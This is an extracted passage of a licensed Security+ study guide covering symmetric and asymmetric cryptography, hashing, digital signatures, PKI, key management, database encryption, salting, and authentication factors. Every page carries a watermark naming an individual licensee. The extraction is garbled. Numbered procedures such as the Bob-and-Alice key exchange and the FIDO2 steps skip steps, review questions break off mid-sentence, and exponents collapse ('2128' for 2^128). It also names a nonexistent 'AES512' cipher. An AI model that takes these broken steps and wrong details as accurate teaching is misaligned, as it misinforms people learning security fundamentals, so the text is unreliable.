key is 13. You could use 17 to achieve a different ciphertext from the same method.
The key is important because it means that even if the cipher method is known, a
message still cannot be decrypted without knowledge of the specific key.
A keyspace is the range of values that the key could be. In the ROT13 example, the
keyspace is 25 (ROT1. . . ROT25). Using ROT0 or ROT26 would result in ciphertext
identical to the plaintext. Using a value greater than 26 to shift through the alphabet
multiple times is equivalent to a key from the 1-25 range. ROT0 and ROT26+ are
weak keys and should not be used.
Modern ciphers use large keyspaces where there are trillions of possible key values.
This makes the key difficult to discover via brute force cryptanalysis. Brute force
cryptanalysis means attempting decryption of the ciphertext with every possible key
value and reading the result to determine if it is still gibberish or plaintext.
Keys for modern symmetric ciphers use a pseudorandomly generated number of
bits. The number of bits is the key length. For example, the most commonly used
symmetric cipher is the Advanced Encryption Standard (AES). This can be used with
two key lengths. AES-128 uses a 128-bit key length. A bit can have one of two values
(0 or 1), so the number of possible key values is two multiplied by itself a number of
times equivalent to the key length. This is written as 2128, where 2 is the base and 128
is the exponent. AES-256 has a keyspace of 2256. This keyspace is not twice as large
as AES-128; it is many trillions of times bigger and consequently signicantly more
resistant to brute force attacks.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The drawback of using larger keys is that the computer must use more memory and
proccessor cycles to perform encryption and decryption.
Asymmetric Encryption
In a symmetric encryption cipher, the same secret key is used to perform both
encryption and decryption operations. With an asymmetric algorithm, encryption
and decryption are performed by two different but related public and private keys
in a key pair.
When a public key is used to encrypt a message, only the paired private key can
decrypt the ciphertext. The public key cannot be used to decrypt the ciphertext. The
keys are generated in a way that it makes it impossible to derive the private key
from the public key. This means that the key pair owner can distribute the public
key to anyone they want to receive secure messages from:
1. Bob generates a key pair and keeps the private key secret.
2. Bob publishes the public key. Alice wants to send Bob a confidential message
so they take a copy of Bob’s public key.
5. Bob receives the message and is able to decrypt it using their private key.
6. If Mallory has been snooping, they can intercept both the message and the
public key.
7. However, Mallory cannot use the public key to decrypt the message, so the
system remains secure.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Hashing
A cryptographic hashing algorithm produces a fixed-length string of bits from an
input plaintext that can be of any length. The output can be referred to as a hash or
as a message digest. The function is designed so that it is impossible to recover the
plaintext data from the digest (one-way) and so that different inputs are unlikely to
produce the same output (a collision).
A hashing algorithm is used to prove integrity. For example, Bob and Alice can
compare the values used for a password in the following way:
1. Bob has a digest calculated from Alice’s plaintext password. Bob cannot
recover the plaintext password value from the hash.
2. When Alice needs to authenticate to Bob, they type their password, converts it
to a hash, and sends the digest to Bob.
3. Bob compares Alice’s digest to the hash value on file. If they match, Bob can
be sure that Alice typed the same password.
As well as comparing password values, a hash of a file can be used to verify the
integrity of that file after transfer.
1. Alice runs a hash function on the setup.exe file for their product. They publish
the digest on their website with a download link for the file.
2. Bob downloads the setup.exe file and makes a copy of the digest.
3. Bob runs the same hash function on the downloaded setup.exe file and
compares it to the reference value published by Alice. If it matches the value
published on the website, Bob assumes the file has integrity.
4. Consider that Mallory might be able to substitute the download file for a
malicious file. Mallory cannot change the reference hash, however.
5. This time, Bob computes a hash but it does not match, leading him to suspect
that the file has been tampered with.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Computing an SHA value from a file (Screenshot used with permission from Microsoft.)
Digital Signatures
A single hash function, symmetric cipher, or asymmetric cipher is called a
cryptographic primitive. A complete cryptographic system or product is likely
to use multiple cryptographic primitives within a cipher suite. The properties of
different symmetric/asymmetric/hash types and of specific ciphers for each type
impose limitations on their use in different contexts and for different purposes.
Encryption can be used to ensure confidentiality. Cryptographic ciphers can also be
used for integrity and authentication. If you can encode a message in a way that no
one else can replicate, then the recipient of the message knows with whom they are
communicating (that is, the sender is authenticated).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Cryptography allows subjects to identify and authenticate themselves. The subject could be a
person or a computer such as a web server.
Public key cryptography can authenticate a sender, because they control a private
key that produces messages in a way that no one else can. Hashing proves integrity
by computing a unique fixed-size message digest from any variable length input.
These two cryptographic ciphers can be combined to make a digital signature:
1. The sender (Alice) creates a digest of a message, using a pre-agreed hash
algorithm, such as SHA256, and then performs a signing operation on the
digest using her chosen asymmetric cipher and private key.
2. Alice attaches the digital signature to the message and sends both the
signature and the message to Bob.
3. Bob verifies the signature using Alice’s public key, obtaining the original hash.
4. Bob then calculates his own digest for the document (using the same
algorithm as Alice) and compares it with Alice’s hash.
If the two digests are the same, then the data has not been tampered with during
transmission, and Alice’s identity is guaranteed. If either the data had changed or a
malicious user (Mallory) had intercepted the message and used a different private
key to sign it, the hashes would not match.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
There are several standards for creating digital signatures. The Public Key Cryptography
Standard #1 (PKCS#1) defines the use of RSA’s algorithm. The Digital Signature
Algorithm (DSA) uses a cipher called ElGamal, but Elliptic Curve DSA (ECDSA) is now
more widely used. DSA and ECDSA were developed as part of the US government’s
Federal Information Processing Standards (FIPS).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Cryptographic Algorithms
3
2. Considering that cryptographic hashing is one way and the digest cannot
2.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 3B
Public Key Infrastructure
6
Public Key Infrastructure (PKI) is the framework that helps to establish trust in the
use of public key cryptography to sign and encrypt messages via digital certificates.
A digital certificate is a public assertion of identity, validated by a certificate
authority (CA).
As a security professional, you are very likely to have to install and maintain PKI
certificate services for private networks. You may also need to obtain and manage
certificates from third-party PKI providers. This topic will help you to explain the
importance of using appropriate cryptographic solutions to implement PKI.
Certificate Authorities
Public key cryptography solves the problem of distributing encryption keys when
you want to communicate securely with others or authenticate a message that you
send to others.
• When you want others to send you confidential messages, you give them
your public key to use to encrypt the message. The message can then only be
decrypted by your private key, which you keep known only to yourself.
• When you want to authenticate yourself to others, you sign a hash of your
message with your private key. You give others your public key to use to verify
the signature. As only you know the private key, everyone can be assured that
only you could have created the signature.
The basic problem with public key cryptography is that while the owner of a private
key can authenticate messages, there is no mechanism for establishing the owner’s
identity. This problem is particularly evident with e-commerce. How can you be
sure that a shopping site or banking service is really maintained by whom it claims?
The fact that the site is distributing a public key to secure communications is no
guarantee of actual identity. How do you know that you are corresponding directly
with the site using its genuine public key? How can you be sure there isn’t a threat
actor with network access intercepting and modifying what you think the legitimate
server is sending you?
Public key infrastructure (PKI) aims to prove that the owners of public keys
are who they say they are. Under PKI, anyone issuing a public key should publish
it in a digital certificate. The certificate’s validity is guaranteed by a certificate
authority (CA).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
PKI can use private or third party CAs. A private CA can be set up within an
organization for internal communications. The certificates it issues will only be
trusted within the organization. For public or business-to-business communications,
a third-party CA can be used to establish a trust relationship between servers and
clients. Examples of third-party CAs include Comodo, DigiCert, GeoTrust, IdenTrust,
and Let’s Encrypt.
Public key infrastructure allows clients to establish a trust relationship with servers via
certificate authorities.
• Ensure the validity of certificates and the identity of those applying for them
(registration).
• Manage the servers (repositories) that store and administer the certificates.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Digital Certificates
A digital certificate is essentially a wrapper for a subject’s public key. As well as the
public key, it contains information about the subject and the certificate’s issuer. The
certificate is digitally signed to prove that it was issued to the subject by a particular
CA. The subject could be a human user (for certificates allowing the signing of
messages, for instance) or a computer server (for a web server hosting confidential
transactions, for instance).
Digital certificate details showing subject's public key. (Screenshot used with
permission from Microsoft.)
Digital certificates are based on the X.509 standard approved by the International
Telecommunications Union and standardized by the Internet Engineering Task Force
(tools.ietf.org/html/rfc5280). RSA also created a set of standards, referred to as Public
Key Cryptography Standards (PKCS), to promote the use of public key infrastructure.
Root of Trust
The root of trust model defines how users and different CAs can trust one another.
Each CA issues itself a certificate. This is referred to as the root certificate. The root
certificate is self-signed, meaning the CA server signs a certificate issued to itself. A
root certificate uses an RSA key size of 2,048 or 4,096 bits or the ECC equivalent. The
subject of the root certificate is set to the organization/CA name, such as “CompTIA
Root CA.”
The root certificate can be used to sign other certificates issued by the CA. Installing
the CA’s root certificate means that hosts will automatically trust any certificates
signed by that CA.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Single CA
In this simple model, a single root CA issues certificates directly to users and
computers. This single CA model is often used on private networks. The problem
with this approach is that the single CA server is very exposed. If it is compromised
the whole PKI collapses.
Third-party CAs
Most third-party CAs operate a hierarchical model. In the hierarchical model, the
root CA issues certificates to one or more intermediate CAs. The intermediate CAs
issue certificates to subjects (leaf or end entities). This model has the advantage
that different intermediate CAs can be set up with certificate policies enabling users
to perceive clearly what a particular certificate is designed for. Each leaf certificate
can be traced to the root CA along the certification path. This is also referred to as
certificate chaining or a chain of trust.
The web server for www.example.org is identified by a certificate issued by the DigiCert TLS
CA1 intermediate CA. The intermediate CA's certificate is signed by DigiCert's Global Root CA
(Screenshot used with permission from Microsoft).
Self-signed Certificates
In some circumstances, using PKI can be too difficult or expensive to manage.
Any machine, web server, or program code can be deployed with a self-signed
certificate. For example, the web administrative interfaces of consumer routers
are often only protected by a self-signed certificate. Self-signed certificates can also
be useful in development and test environments. The operating system or browser
will mark self-signed certificates as untrusted, but a user can choose to override
this. The nature of self-signed certificates makes them very difficult to validate. They
should not be used to protect critical hosts and applications.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Using a web form in the OPNsense firewall appliance to request a certificate. The DNS and
IP alternative names must match the values that clients will use to browse the site.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The example domain's certificate is configured with alternative subject names for different
top-level domains and subdomains. (Screenshot used with permission from Microsoft.)
It is still safer to put the FQDN in the CN as well, because not all browsers and
implementations stay up to date with the standards.
The SAN field also allows a certificate to represent different subdomains, such
as www.comptia.org and members.comptia.org. Listing the specific
subdomains is more secure, but if a new subdomain is added, a new certificate
must be issued. A wildcard domain, such as *.comptia.org, means that the
certificate issued to the parent domain will be accepted as valid for all subdomains
(to a single level).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
CompTIA's website certificate configured with a wildcard domain, allowing access via either https://
comptia.org or https://www.comptia.org. (Screenshot used with permission from Microsoft.)
A certificate also contains fields for Organization (O), Organizational Onit (OU), Locality
(L), State (ST), and Country (C). These are concatenated with the common name to form
a Distinguished Name (DN). For example, Example LLC's DN could be the following:
CN=www.example.com, OU=Web Hosting, O=Example
LLC, L=Chicago, ST=Illinois, C=US.
Different certificate types can be used for purposes other than server/computer
identification. User accounts can be issued with email certificates, in which case the SAN
is an RFC 822 email address. A code-signing certificate is used to verify the publisher or
developer of software and scripts. These don't use a SAN, but the CA must validate the
organization and locale details to ensure accuracy and that a rogue developer is not
attempting to impersonate a well-known software company.
Certificate Revocation
A certificate may be revoked or suspended:
• A revoked certificate is no longer valid and cannot be “un-revoked” or reinstated.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The distribution point field in a digital certificate identifies the location of the
list of revoked certificates, which are published in a CRL file signed by the CA.
(Screenshot used with permission from Microsoft.)
With the CRL system, there is a risk that the certificate might be revoked but still
accepted by clients because an up-to-date CRL has not been published. A further
problem is that the browser (or other application) may not be configured to
perform CRL checking, although this now tends to be the case only with legacy
browser software.
Another means of providing up-to-date information is to check the certificate’s
status on an Online Certificate Status Protocol (OCSP) server. Rather than return
a whole CRL, this communicates requested certificate’s status. Details of the OCSP
responder service should be published in the certificate.
Most OCSP servers can query the certificate database directly and obtain the
real-time status of a certificate. Other OCSP servers actually depend on the
CRLs and are limited by the CRL publishing interval.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Key Management
Key management refers to operational considerations for the various stages in a
key’s lifecycle. A key’s lifecycle may involve the following stages:
• Key Generation—creates an asymmetric key pair or symmetric secret key of the
required strength, using the chosen cipher.
A decentralized key management model means that keys are generated and
managed directly on the computer or user account that will use the certificate. This
does not require any special setup and so is easy to deploy. It makes the detection
of key compromise more difficult, however.
Some organizations prefer to centralize key generation and storage using a tool
such as a key management system. In one type of cryptographic key management
system, a dedicated server or appliance is used to generate and store keys. When
a device or app needs to perform a cryptographic operation, it uses the Key
Management Interoperability Protocol (KMIP) to communicate with the server.
• A key stored in the file system is only as secure as any other file. It could
easily be compromised via the user credential or physical theft of the device. It
is also difficult to ensure that key access is fully audited. Ideally, cryptographic
storage is tamper evident. This means that it is known immediately when a
private or secret key has been compromised and it can be revoked and any
ciphertexts re-encrypted with a new key.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Pseudo RNG working during key generation using GPG. This method gains entropy from user
mouse and keyboard usage.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Vendors can certify their products against the Federal Information Processing Standard
140 Level 2 (FIPS 140-2) to establish trust in the market.
Using a cryptoprocessor means that keys are not directly accessible via the file
system. The cryptoprocessor interacts with applications that need to access the key
via an application programming interface (API) that implements PKCS#11.
One vulnerability in this system is that decrypted data needs to be loaded into
the computer’s system memory (RAM) for applications to access it. This raises
the potential for a malicious process to gain access to the data via some type of
exploit. This vulnerability can be mitigated by implementing a secure enclave. A
trusted execution environment (TEE) secure enclave, such as Intel Software Guard
Extensions, is able to protect data stored in system memory so that an untrusted
process cannot read it. A secure enclave is designed so that even processes with
root or system privileges cannot access it without authorization. The enclave is
locked to a list of one or more digitally signed processes.
Key Escrow
If a private or secret key is lost or damaged, ciphertexts cannot be recovered unless
a backup of the key has been made. Making copies of the key is problematic as it
becomes more likely that a copy will be compromised and more difficult to detect
that a compromise has occurred.
These issues can be mitigated by using escrow and M of N controls. Escrow means
that something is held independently. In terms of key management, this refers to
archiving a key (or keys) with a third party. M of N means that an operation cannot
be performed by a single individual. Instead, a quorum (M) of available persons (N)
must agree to authorize the operation.
A key can be split into one or more parts. Each part can be held by separate escrow
providers, reducing the risk of compromise. An account with permission to access
a key held in escrow is referred to as a key recovery agent (KRA). A recovery policy
can require two or more KRAs to authorize the operation. This mitigates the risk of
a KRA attempting to impersonate the key owner.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Public Key Infrastructure
7
3. What extension field is used with a web server certificate to support the
identification of the server by multiple specific subdomain labels?
5. You are advising a customer about encryption for data backup security
and the key escrow services that you offer. How should you explain the
risks of key escrow and potential mitigations?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 3C
Cryptographic Solutions
8
• Data in transit (or data in motion)—is the state when data is transmitted over
a network.
• Data in use (or data in processing)—is the state when data is present in volatile
memory, such as system RAM or CPU registers and cache.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. The system generates a symmetric secret key for the chosen cipher such as
AES256 or AES512. This is referred to as a file or media or data encryption key
(DEK). This key is used to encrypt the target data.
3. The data encryption key is then encrypted using the public key portion of
the KEK.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Metadata can include a list of files, the file owner, and created/last modified dates.
Free or unallocated space can contain data remnants, where a file has been marked as
deleted, but the data has not actually been erased from the storage medium.
If the device has a TPM or HSM compatible with the encryption product, the disk/
volume/file system can be locked by keys stored in the TPM or HSM.
Database Encryption
A structured database stores data in tables. Each table is composed of column
fields with a given data type. Records are stored as rows in the table with a value
entered for each field. The table data is ultimately stored as files on a volume, but
access is designed to be mediated through a database management system (DBMS)
running a database language such as Structured Query Language (SQL). Typically,
the database is hosted on a server and accessed by client applications.
The underlying files could be protected by a disk or volume encryption product
running on the server. This will typically have an adverse impact on performance,
so encryption is more commonly implemented by the DBMS or by a plug-in.
Encryption can be applied at different granular levels. While each DBMS supports
different features, the following encryption options, based on Microsoft’s SQL
Server DBMS, are typical.
Database-Level Encryption
Database- or page-level encryption and decryption occurs when any data is
transferred between disk and memory. This is referred to as transparent data
encryption (TDE) in SQL Server. A page is the means by which the database engine
returns the data requested by a query from the underlying storage files. This type of
encryption means that all the records are encrypted while they are stored on disk,
protecting against theft of the underlying media. It also encrypts logs generated by
the database.
Record-Level Encryption
Many databases contain secrets that should not be known by the database
administrator. Public key encryption can solve this problem by storing the private
key used to unlock the value of a cell outside of the database.
Cell/column encryption is applied to one or more fields within a table. This can have
less of a performance impact than database-level encryption, but the administrator
needs to identify which fields need protection. It can also complicate client access to
the data. The encryption/decryption mechanism can work in several ways, but with
SQL Server’s Always Encrypted feature, the data remains encrypted when loaded
into memory. It is only decrypted when the client application supplies the key. The
plaintext key is not available to the DBMS, so the database administrator cannot
decrypt the data. This allows for the separation of duties between the database
administrator and the data owner, which is important for privacy.
Some solutions may additionally support record-level encryption. For example,
a health insurer’s database might store protected health information about its
customers. Each customer could be identified by a separate key pair. This key pair
would be used to encrypt data at a row/record level. The table contains records
separately protected by different keys. This allows fine-grained control over how
data can be accessed to meet compliance requirements for security and privacy.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. Alice encrypts their message using a secret key cipher, such as AES. In this
context, the secret key is referred to as a session key.
4. Alice attaches the encrypted session key to the ciphertext message in a digital
envelope and sends it to Bob.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Using Diffie-Hellman to derive a secret value to use to generate a shared symmetric encryption
key securely over a public channel. (Images © 123RF.com.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Using ephemeral session keys means that any future compromise of the server will
not translate into an attack on recorded data. Also, even if an attacker can obtain
the key for one session, the other sessions will remain confidential. This massively
increases the amount of cryptanalysis that an attacker would have to perform to
recover an entire “conversation.”
PFS using the modular arithmetic shown in the diagram is called Diffie-Hellman
Ephemeral (DHE). PFS is now more usually implemented as Elliptic Curve DHE (ECDHE).
Salting
Cryptographic hash functions are often used for password storage and
transmission. A hash cannot be decrypted back to the plaintext password that
generated it. Hash functions are one way. However, passwords stored as hashes
are vulnerable to brute force and dictionary attacks.
A threat actor can generate hashes to try to find a match for a hash captured from
network traffic or a password file. A brute force attack simply runs through every
possible combination of letters, numbers, and symbols. A dictionary attack creates
hashes of common words and phrases.
Both these attacks can be slowed down by adding a salt value when creating the
hash. A salted hash is computed as follows:
(salt + password) * SHA = hash
A unique, random salt value should be generated for each user account. This
mitigates the risk that if users choose identical plaintext passwords, there would
be identical hash values in the password file. The salt is not kept secret, because
any system verifying the hash must know the value of the salt. It simply means that
an attacker cannot use precomputed tables of hashes. The hash values must be
recompiled with the specific salt value for each password.
Key Stretching
Key stretching takes a key that’s generated from a user password plus a random
salt value and repeatedly converts it to a longer and more disordered key. The
initial key may be put through thousands of rounds of hashing. This might not be
difficult for the attacker to replicate, so it doesn’t actually make the key stronger. It
does slow the attack down, because the attacker has to do all this extra processing
for each possible key value. Key stretching can be performed by using a particular
software library to hash and save passwords when they are created. The Password-
Based Key Derivation Function 2 (PBKDF2) is very widely used for this purpose,
notably as part of Wi-Fi Protected Access (WPA).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Blockchain
Blockchain is a concept in which an expanding list of transactional records is
secured using cryptography. Each record is referred to as a block and is run through
a hash function. The hash value of the previous block in the chain is added to the
hash calculation of the next block in the chain. This ensures that each successive
block is cryptographically linked. Each block validates the hash of the previous block
all the way through to the beginning of the chain, ensuring that each historical
transaction has not been tampered with. In addition, each block typically includes
a time stamp of one or more transactions as well as the data involved in the
transactions themselves.
The blockchain is recorded in an open public ledger. This ledger does not exist
as an individual file on a single computer; rather, one of the most important
characteristics of a blockchain is that it is decentralized. The ledger is distributed
across a peer-to-peer (P2P) network in order to mitigate the risks associated with
having a single point of failure or compromise. Blockchain users can therefore
trust each other equally. Likewise, another defining quality of a blockchain is its
openness—everyone has the same ability to view every transaction on a blockchain.
Blockchain technology has a variety of potential applications. It can ensure the
integrity and transparency of financial transactions, legal contracts, copyright and
intellectual property (IP) protection, online voting systems, identity management
systems, and data storage.
Obfuscation
Obfuscation is the art of making a message or data difficult to find. It is security
by obscurity, which is normally deprecated. There are some uses for obfuscation
technologies, however:
• Steganography (literally meaning “hidden writing”) embeds information
within an unexpected source; a message hidden in a picture, for instance. The
container document or file is called the covertext. The message can be encrypted
by some mechanism before embedding it, providing confidentiality. The
technology can also provide integrity or non-repudiation; for example, it could
show that something was printed on a particular device at a particular time,
which could demonstrate that it was genuine or fake, depending on the context.
• Data masking can mean that all or part of the contents of a database field are
redacted by substituting all character strings with “x”, for example. A field might
be partially redacted to preserve metadata for analysis purposes. For example,
in a telephone number, the dialing prefix might be retained, but the subscriber
number is redacted. Data masking can also use techniques to preserve the
original format of the field.
• Tokenization means that all or part of the value of a database field is replaced
with a randomly generated token. The token is stored with the original value
on a token server or token vault, separate from the production database.
An authorized query or app can retrieve the original value from the vault, if
necessary, so tokenization is reversible. Tokenization is used as a substitute for
encryption because, from a regulatory perspective, an encrypted field is the
same value as the original data.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Cryptographic Solutions
9
1. In an FDE product, what type of cipher is used for a key encrypting key?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 3
Summary
5
• Asymmetric key pair for key exchange: RSA 2,048-bit or ECDHE 256-bit
• Determine certificate policies and types that meet the needs of users and
business workflows, such as server/machine, email/user, and code-signing
certificate types. Ensure that the attribute fields are correctly configured when
issuing certificates, taking special care to ensure that the SAN field lists domains,
subdomains, or wildcard domains by which a server is accessed.
• Create policies and procedures for users and servers to submit CSRs, plus the
identification, authentication, and authorization processes to ensure certificates
are only issued to valid subjects.
• Set up procedures for managing keys and certificates, including revocation and
backup/escrow of keys, ideally using dedicated hardware cryptoprocessors, such
as TPMs and HSMs.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Each network user and host device must be identified with an account so that you
can control their access to your organization’s applications, data, and services. The
processes that support this requirement are referred to as identity and access
management (IAM). Within IAM, authentication technologies ensure that only valid
subjects (users or devices) can operate an account. Authentication requires the
account holder to submit credentials that should only be known or held by them in
order to access the account. There are many authentication technologies, and it is
imperative that you be able to implement and maintain these security controls.
As well as ensuring that only valid users and devices connect to managed networks
and devices, you must ensure that these subjects are authorized with only the
necessary permissions and privileges to access and change resources. These tasks
are complicated by the need to manage identities across on-premises networks,
cloud services, and web/mobile apps.
Lesson Objectives
In this lesson, you will do the following:
• Implement password-based and multifactor authentication.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 4A
Authentication
2
Assuming that an account has been created securely and the identity of the account
holder has been verified, authentication verifies that only the account holder is
able to use the account and that the system may only be used by account holders.
Authentication technologies allow the use not only of passwords, but also of
biometric and token factors to better secure accounts. Understanding the strengths
and weaknesses of these factors will help you to implement and maintain strong
authentication systems.
Authentication Design
Authentication is performed when a supplicant or claimant presents credentials
to an authentication server. The server compares what was presented
to the copy of the credentials it has stored. If they match, the account is
authenticated. Authentication design refers to selecting a technology that meets
requirements for confidentiality, integrity, and availability:
• Confidentiality, in terms of authentication, is critical, because if account
credentials are leaked, threat actors can impersonate the account holder and act
on the system with whatever rights they have.
• Integrity means that the authentication mechanism is reliable and not easy for
threat actors to bypass or trick with counterfeit credentials.
• Availability means that the time taken to authenticate does not impede
workflows and is easy enough for users to operate.
There are many different technologies for defining credentials. These can be
categorized as factors. The longest-standing authentication factor is “Something
You Know” or a knowledge factor.
The typical knowledge factor is the login, composed of a username and a password.
The username is typically not a secret (although it should not be published openly),
but the password must be known only to the account holder. A passphrase is a
longer password composed of several words. This has the advantages of being
more secure and easier to remember.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Password Concepts
Improper credential management continues to be one of the most fruitful vectors
for network attacks. If an organization must continue to rely on password-based
credentials, its usage needs to be governed by strong policies and training.
A password best practices policy instructs users on choosing and maintaining
passwords. More generally, a credential management policy should instruct users
on how to keep their authentication method secure, whether this be a password,
smart card, or biometric ID. The credential management policy also needs to alert
users to diverse types of social engineering attacks. Users need to be able to spot
phishing and pharming attempts, so that they do not enter credentials into an
unsecure form or spoofed site.
To supplement best practice awareness, system-enforced account policies can
help to enforce credential management principles by stipulating requirements for
user-selected passwords:
• Password Length—enforces a minimum length for passwords. There may also
be a maximum length.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Password Age—forces the user to select a new password after a set number
of days.
Password aging and expiration can mean the same thing. However, some systems
distinguish between them. If this is the case, aging means that the user can still log on
with the old password after the defined period, but they must then immediately choose
a new password. Expiration means that the user can no longer sign in with the outdated
password and the account is effectively disabled.
You should note that the most recent guidance issued by NIST (nvlpubs.nist.gov/
nistpubs/SpecialPublications/NIST.SP.800-63b.pdf) deprecates some of the "traditional"
elements of password best practices, such as complexity, aging, and the use of
password hints.
Password reuse can also mean using a work password elsewhere (on a retail website,
for instance). This sort of behavior can only be policed by soft policies.
Password Managers
Users often adopt poor credential management practices that are hard to control,
such as using the same password for corporate networks and consumer websites.
This makes enterprise network security vulnerable to data breaches from these
websites. This risk is mitigated by a password manager:
1. The user selects a password manager app or service. Most operating systems
and browsers implement password managers. Examples include Windows
Credential Manager and Apple’s iCloud Keychain. If using a third-party
password manager, the user installs a plug-in for their chosen browser.
2. The user secures the password vault with a master password. The vault
is likely to be stored in the cloud so that accounts can be accessed across
multiple devices, but some password managers offer local storage only.
4. When the user subsequently browses a site, the password manager validates
the site’s identity using its digital certificate and presents an option for the
user to fill in the password.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The main risks from password managers are selection of a weak master password,
compromise of the vendor’s cloud storage or systems, and impersonation attacks
designed to trick the manager into filling a password to a spoofed site.
Multifactor Authentication
An authentication design that uses only passwords or a single knowledge factor is
considered weak. Password secrets are too prone to compromise to be reliable.
Other types of authentication factor can be used to supplement or replace
password-based logins. A multifactor authentication (MFA) technology combines
the use of more than one type of factor.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
You might also see references to two-factor authentication (2FA). This just means that
there are precisely two factors involved, such as an ownership-based smart card or
biometric identifier with something you know, such as a password or PIN.
Biometric Authentication
The first step in setting up biometric authentication is enrollment:
1. A sensor module acquires the biometric sample from the target.
When the user wants to access a resource, they are re-scanned, and the scan is
compared to the template. If they match to within a defined degree of tolerance,
access is granted.
Biometric athentication can be challenging to implement. The efficacy rate of
biometric pattern acquisition and matching and suitability as an authentication
mechanism can be evaluated using the following metrics and factors:
• False Rejection Rate (FRR)—is where a legitimate user is not recognized.
This is also referred to as a Type I error or false non-match rate (FNMR). FRR is
measured as a percentage.
False rejection causes inconvenience to users, but false acceptance can lead
to security breaches, and so is usually considered the most important metric.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower
the CER, the more efficient and reliable the technology.
Errors are reduced over time by tuning the system. This is typically accomplished
by adjusting the sensitivity of the system until CER is reached.
• Throughput (speed)—is the time required to create a template for each user
and the time required to authenticate. This is a major consideration for high-
traffic access points, such as airports or railway stations.
Facial recognition records multiple indicators about the size and shape of the face
like the distance between the eyes or the width and length of the nose. The scan
usually uses optical and infrared cameras or sensors to defeat spoofing attempts
that substitute a photo for a real face.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
There are also simpler smart cards and fobs that simply transmit a static token
programmed into the device. For example, many building entry systems work on the
basis of static codes. These mechanisms are highly vulnerable to cloning and replay
attacks.
Soft tokens sent via SMS or email do not really count as an ownership factor. These
systems can be described as two-step verification rather than MFA. The tokens are
highly vulnerable to interception.
A more secure soft OTP token can be generated using an authenticator app. This
is software installed on a computer or smartphone. The user must register each
identity provider with the app, typically using a scannable quick response (QR)
code to communicate the shared secret. When prompted to authenticate, the
user must unlock the authenticator app with their device credential to view the
OTP token. There is less risk of interception than with an SMS or email message,
but as it runs on a shared-use device, there is the possibility that malware could
compromise the app.
Using an authenticator app to sign in to a site. After the user signs in with a password,
the site prompts them to authorize the sign in using the authenticator app installed
on their smartphone.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Passwordless Authentication
With token-based MFA, the user account is typically still configured with a
password. This might be used as a backup mechanism or there might be a two-step
verification process, where the user must enter their password and then submit
an OTP.
Passwordless means that the whole authentication system no longer processes
knowledge-based factors. The FIDO2 with WebAuthn specifications provides a
framework for passwordless authentication. It works basically as follows:
1. The user chooses either a roaming authenticator, such as a security key, or a
platform authenticator implemented by the device OS, such as Windows Hello
or Face ID/Touch ID for macOS and iOS.
2. The user configures a secure method or local gesture to confirm presence and
authenticates the device. This gesture could be a fingerprint, face recognition,
or PIN. This credential is only ever validated locally by the authenticator.
5. The relying party uses the public key to verify the signature and authenticate
the account session.
As with FIDO U2F, this provides similar security to smart card authentication,
but does not require accounts to have digital certificates and PKI, reducing the
management burden. FIDO2 WebAuthn improves on FIDO U2F by adding an
application programming interface (API) that allows web applications to work
without a password element to authentication. Most FIDO U2F authenticators
should also support FIDO2/WebAuthn.
For a passwordless system to be secure, the authenticator must be trusted
and resistant to spoofing or cloning attacks. Attestation is a mechanism for an
